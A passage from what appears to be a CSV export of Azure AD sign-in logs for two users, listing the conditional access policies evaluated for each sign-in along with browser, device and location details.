'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9eab3b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,03932e54-fdb0-4c07-8405-8b9eab3b1300,SigninLogs,Sucess,33.7984581,-84.38828278
+2091,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:31.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5d9c265a-69fb-440e-9b79-89deb06b986b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",24b904d7-063a-4f4c-9637-40c717ed1200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,24b904d7-063a-4f4c-9637-40c717ed1200,SigninLogs,Sucess,50.6406517,5.572050095
+2092,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:50.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,12857653-79c4-41f4-84ac-80fb3bfd709d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbffb959-9fbe-4abe-95ed-0d8518481300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,cbffb959-9fbe-4abe-95ed-0d8518481300,SigninLogs,Sucess,33.7984581,-84.38828278
+2093,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:21.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c8aaf75-8554-487b-9239-e9caae46aff8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c8ea9bc1-b11e-4423-93a8-17c0162d1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c8ea9bc1-b11e-4423-93a8-17c0162d1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2094,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:31.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2f4451f6-4610-4919-b3aa-3477164d38fb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",368167e5-753b-476f-b20c-ef0208441000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,368167e5-753b-476f-b20c-ef0208441000,SigninLogs,Sucess,41.90428925,-85.99833679
+2095,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ec9469f-2069-0000-5421-7f572a394e0f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6382c33b-18b0-46b9-982e-4aa96be01000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa96be01000,SigninLogs,Sucess,41.90428925,-85.99833679
+2096,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2340e547-da35-4a99-b70d-d2dc9a432b03,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6382c33b-18b0-46b9-982e-4aa9aae11000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa9aae11000,SigninLogs,Sucess,41.90428925,-85.99833679
+2097,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:32.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,877a5de0-f73f-4617-b3b7-df7619999073,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",93ca542e-4eab-45c4-8608-b71540061300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,93ca542e-4eab-45c4-8608-b71540061300,SigninLogs,Sucess,41.90428925,-85.99833679
+2098,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:50.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,12857653-79c4-41f4-84ac-80fb3bfd709d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 